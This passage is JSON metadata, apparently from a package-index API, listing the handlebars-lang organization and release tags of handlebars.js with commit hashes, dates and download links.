Language","uuid":"19378685","kind":"organization","description":"","email":null,"website":"https://handlebarsjs.com/","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/19378685?v=4","repositories_count":8,"last_synced_at":"2024-04-28T02:35:24.096Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/handlebars-lang","funding_links":[],"total_stars":17814,"followers":61,"following":0,"created_at":"2022-11-02T16:37:33.313Z","updated_at":"2024-04-28T02:35:25.495Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang/repositories"},"tags":[{"name":"v4.7.9","sha":"dce542c9a660048d31f0981ac8a45c08b919bddb","kind":"tag","published_at":"2026-03-26T20:44:06.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.9","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.9/manifests"},{"name":"v4.7.8","sha":"8dc3d2517b41d12b1e06f88a449f30d27c137c21","kind":"tag","published_at":"2023-08-01T21:10:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.8/manifests"},{"name":"v4.7.7","sha":"a9a8e403213583ca90cb7c872d3a22796c37d961","kind":"tag","published_at":"2021-02-15T09:36:12.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.7/manifests"},{"name":"v4.7.6","sha":"e6ad93ea01bcde1f8ddaa4b4ebe572dd616abfaa","kind":"tag","published_at":"2020-04-03T17:56:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.6/manifests"},{"name":"v4.7.5","sha":"1fd2edee2a12fb228061fcde807905c6b14339c4","kind":"tag","published_at":"2020-04-02T19:09:52.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.5/manifests"},{"name":"v4.7.4","sha":"7adc19ab40917389fc1372d19677f1d024ec42b1","kind":"tag","published_at":"2020-04-01T17:20:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.4/manifests"},{"name":"v3.0.8","sha":"16bd606fec0ada4c811eb7afe6bfd619d88f3d37","kind":"tag","published_at":"2020-02-23T10:02:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.8/manifests"},{"name":"v4.7.3","sha":"c9789691af60b446f12f75dd9762f9d8fd3f36eb","kind":"tag","published_at":"2020-02-05T05:10:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.3/manifests"},{"name":"v4.7.2","sha":"586e672c8bba7db787bc9bfe9a9fde4ec98d5b4f","kind":"tag","published_at":"2020-01-13T20:53:16.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.2/manifests"},{"name":"v4.7.1","sha":"14ba3d0c43d75bcfcdbfb7c95c9fac99d88a17c8","kind":"tag","published_at":"2020-01-12T12:21:10.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.1/manifests"},{"name":"v4.7.0","sha":"0d5c807017f8ba6c6d947f9d6852033c8faa2e49","kind":"tag","published_at":"2020-01-10T16:24:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"91a1b5d2f456cb733cbd88149fc9270973db79d7","kind":"tag","published_at":"2020-01-08T22:45:17.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.6.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.6.0/manifests"},{"name":"v4.5.3","sha":"c819c8b533934d2ac18001d7eb27a3205b00c2f3","kind":"tag","published_at":"2019-11-18T07:10:26.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.3/manifests"},{"name":"v4.5.2","sha":"8de121d21c88a6ab877e3a0eec9daaac483f3bf0","kind":"tag","published_at":"2019-11-13T21:07:27.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.2/manifests"},{"name":"v4.5.1","sha":"7ef86173abb446cf564ad6dc2646a4c361e2ab9f","kind":"tag","published_at":"2019-10-29T04:42:23.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.1/manifests"},{"name":"v4.5.0","sha":"b24797da01afd4e849fdb315dea8335792974522","kind":"tag","published_at":"2019-10-28T18:47:51.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.0/manifests"},{"name":"v4.4.5","sha":"8e1cce79186ab6caeb8c6ec9c1f8bcfa1a40e83d","kind":"tag","published_at":"2019-10-20T21:08:10.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.5/manifests"},{"name":"v4.4.4","sha":"2ab261eab7835e9c80ad1cb7ef9fc9b0f46d6a57","kind":"tag","published_at":"2019-10-20T19:33:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.4/manifests"},{"name":"v4.4.3","sha":"2e53fba68f8c51f9aca97615944fdbdeba94ff62","kind":"tag","published_at":"2019-10-08T20:05:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.3/manifests"},{"name":"v4.4.2","sha":"b793350fec0bb652c0bb2658089d7002af27a76b","kind":"tag","published_at":"2019-10-02T20:44:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.2/manifests"},{"name":"v4.2.2","sha":"0d5c691f36baae183349c51c47228da45278c50a","kind":"tag","published_at":"2019-10-02T20:12:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.2/manifests"},{"name":"v4.3.5","sha":"e96c1a5d86d8b2e8b152578fa37d5cdebc2964a3","kind":"tag","published_at":"2019-10-02T20:05:02.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.5/manifests"},{"name":"v4.4.1","sha":"b8e769fcb624664a6bc7114c8739c2438d46dbe9","kind":"tag","published_at":"2019-10-02T19:52:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"059b33057925ebda96536421cfc7c4c75e5c61e3","kind":"tag","published_at":"2019-09-29T13:29:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.0/manifests"},{"name":"v4.3.4","sha":"c958cc89550ca411a78fefa426b0acee80c702eb","kind":"tag","published_at":"2019-09-28T11:25:05.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.4/manifests"},{"name":"v4.3.3","sha":"e4738491b3e8db97aa9b4f9967f04093ceba1a1f","kind":"tag","published_at":"2019-09-27T05:46:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.3/manifests"},{"name":"v4.3.2","sha":"2357140c68d17cb4f8ab74431e8737de6b4b39b5","kind":"tag","published_at":"2019-09-26T21:58:48.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.2/manifests"},{"name":"v4.3.1","sha":"050cca0866b3496852d9b198141807c32e4dae81","kind":"tag","published_at":"2019-09-24T22:32:32.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.1/manifests"},{"name":"v4.3.0","sha":"a89081d440a9da9f3f25835f47de837907b0094a","kind":"tag","published_at":"2019-09-24T06:04:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"fff3e40402c9f9cd790984560658646a26e1c930","kind":"tag","published_at":"2019-09-20T17:40:48.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"164c7ceea4ce074f70f2fefeba81e2e551757ea6","kind":"tag","published_at":"2019-09-03T19:58:07.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.0/manifests"},{"name":"v4.1.2-0","sha":"f98c6a54256fec0b36ae1adc4c36ab5412ca3b88","kind":"tag","published_at":"2019-08-25T16:06:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.2-0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.2-0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.1.2-0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2-0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2-0/manifests"},{"name":"v3.0.7","sha":"55e4d9d80d5dd834fcf53c528e7e0aa080f315a5","kind":"tag","published_at":"2019-06-30T08:53:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.7/manifests"},{"name":"v4.0.14","sha":"272362e44c66d0110a4c98c7c1d121971ce447a7","kind":"tag","published_at":"2019-04-13T14:39:19.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.14","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.14/manifests"},{"name":"v4.1.2","sha":"10b5fcf92e6f3ddcbcec93c05c00cfdbb2e8d303","kind":"tag","published_at":"2019-04-13T14:19:22.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"f691db546e7563e1db3437d5a72f478f9e556714","kind":"tag","published_at":"2019-03-16T21:28:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.1/manifests"},{"name":"v4.0.13","sha":"9d4fff19d438a390b4e34d0a175b2de5f196cea8","kind":"tag","published_at":"2019-02-07T10:26:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13/manifests"},{"name":"v4.1.0","sha":"7caca944b1ae64b5bc11cba67d21e4b51ba6196a","kind":"tag","published_at":"2019-02-07T09:46:32.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.0/manifests"},{"name":"v4.0.13-beta.0","sha":"616f8c6fdb8b4224e5ab742e0ae400cfbc74086f","kind":"tag","published_at":"2019-02-02T20:26:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13-beta.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.13-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-beta.0/manifests"},{"name":"v4.0.13-0","sha":"0e56659f7bc9d5060bf791d58fd57c5f9a82ae17","kind":"tag","published_at":"2019-02-02T20:25:22.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13-0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13-0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.13-0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-0/manifests"},{"name":"v3.0.6","sha":"5a427d2d2b7264a83ca6702fddf63a6c7ba281c4","kind":"tag","published_at":"2019-01-02T09:17:56.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"64254b604b9d7fdf76d40b9c6675326eb4bda42b","kind":"tag","published_at":"2018-12-15T13:16:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_jo